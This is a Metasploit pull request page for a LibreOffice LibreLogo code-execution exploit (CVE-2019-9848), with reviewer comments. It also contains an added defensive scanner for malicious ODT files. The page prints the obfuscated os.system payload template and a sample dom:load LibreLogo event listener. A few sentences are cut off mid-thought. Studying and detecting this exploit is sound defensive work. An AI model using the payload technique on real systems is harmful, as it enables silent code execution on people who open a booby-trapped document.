Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) #12147
It seems to also work on 6.2.5 (should be tested again) and doesn't require any user interaction after opening the odt file with a vulnerable LibreOffice (in comparison to the original PoC).
This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.
LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands.
By using the document event feature to trigger LibreLogo to execute python contained within a document, a malicious document could be constructed which would execute arbitrary python commands silently without warning.
This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.
The generated document file contains a Python one-liner that calls
getattr(__import__("os"),"system")("<%= @cmd %>")
but with smart quotes
<text:p text:style-name="P8">getattr(__import__(“\x6f\x73”),“\x73\x79\x73\x74\x65\x6d”)(“<%= @cmd %>”)</text:p>
To avoid any python error, the
LibreOffice version 6.2.5 and prior.
This module has been tested successfully with:
LibreOffice 6.2.4 on Windows 7
LibreOffice 6.2.4 on Debian 9.9
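A defender-side check for the document structure the description above lays out, added here as an example (it is not code from the PR or from the Metasploit module): it unzips an ODT, flags any document-event listener whose target is LibreLogo, and flags body paragraphs that contain Python-like calls, including the smart-quoted, \xNN-escaped form shown above. The LibreLogo script URI in the constructed sample and the CMD_PLACEHOLDER string are assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
# Standard OpenDocument namespace URIs used in content.xml.
NS_SCRIPT = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
NS_TEXT = "urn:oasis:names:tc:opendocument:xmlns:text:1.0"
NS_XLINK = "http://www.w3.org/1999/xlink"
EVENT_TAG, EVENT_NAME = "{%s}event-listener" % NS_SCRIPT, "{%s}event-name" % NS_SCRIPT
HREF, P_TAG = "{%s}href" % NS_XLINK, "{%s}p" % NS_TEXT
# Curly quotes and \xNN escapes defeat naive ASCII-quote matching, so match the calls and escapes.
PY_PATTERN = re.compile(r"__import__|getattr\s*\(|\\x[0-9a-fA-F]{2}")
SMART_QUOTES = "\u201c\u201d\u2018\u2019"

def scan_odt(data: bytes) -> list:
    """Return findings for an ODT given as bytes; an empty list means nothing seen."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if "content.xml" not in z.namelist():
            return findings
        root = ET.fromstring(z.read("content.xml"))
    # 1. A document-event listener whose target is LibreLogo is suspicious on its own.
    for ev in root.iter(EVENT_TAG):
        href = ev.get(HREF, "")
        if "LibreLogo" in href:
            findings.append("LibreLogo listener on %s: %s" % (ev.get(EVENT_NAME), href))
    # 2. Body text that reads like Python is the carrier for the LibreLogo program.
    for p in root.iter(P_TAG):
        body = "".join(p.itertext())
        if PY_PATTERN.search(body):
            tag = " (smart quotes)" if any(q in body for q in SMART_QUOTES) else ""
            findings.append("python-like paragraph%s: %s" % (tag, body[:60]))
    return findings

def build_odt(content_xml: str) -> bytes:
    # Pack a content.xml into a minimal ODT-shaped zip (constructed test input only).
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("content.xml", content_xml)
    return buf.getvalue()

# Constructed samples: the LibreLogo script URI is an assumption, CMD_PLACEHOLDER stands in for the command.
XMLNS = ('xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
         'xmlns:script="%s" xmlns:text="%s" xmlns:xlink="%s"' % (NS_SCRIPT, NS_TEXT, NS_XLINK))
MALICIOUS_XML = ("<office:document-content %s><office:scripts><office:event-listeners>"
    '<script:event-listener script:language="ooo:script" script:event-name="dom:load" '
    'xlink:href="vnd.sun.star.script:LibreLogo|LibreLogo.py$run?language=Python&amp;location=share"/>'
    "</office:event-listeners></office:scripts><office:body><office:text>"
    '<text:p text:style-name="P8">getattr(__import__(\u201c\\x6f\\x73\u201d),'
    "\u201c\\x73\\x79\\x73\\x74\\x65\\x6d\u201d)(\u201cCMD_PLACEHOLDER\u201d)</text:p>"
    "</office:text></office:body></office:document-content>" % XMLNS)
CLEAN_XML = ("<office:document-content %s><office:body><office:text><text:p>Quarterly "
    "report, nothing to see.</text:p></office:text></office:body></office:document-content>" % XMLNS)
```

On a real file, `scan_odt(open(path, "rb").read())` returns the same list; a non-empty result is a reason to quarantine the document rather than open it.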
Is there a reason to use
I ask, because this is a file format exploit, and there's no guarantee the user will open the document on the correct platform. Comparatively, if you're already executing native Python code, you could use a Python payload, which should effectively be universal, and execute regardless of the target platform.
FWIW, I tested this on Linux Mint 19.
Initial exploitation failed, as the Libre Logo package was not installed by default.
However, upon installation, the exploit worked as described:
Hi @LoadLow, I just noticed that you're working off of your
This helps protect the process, ensures users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes, and allows contributors to make progress while a PR is still being reviewed.
I'll go ahead and close this PR, and I'll be looking out for the new PR. Apologies for not catching this sooner. Thank you!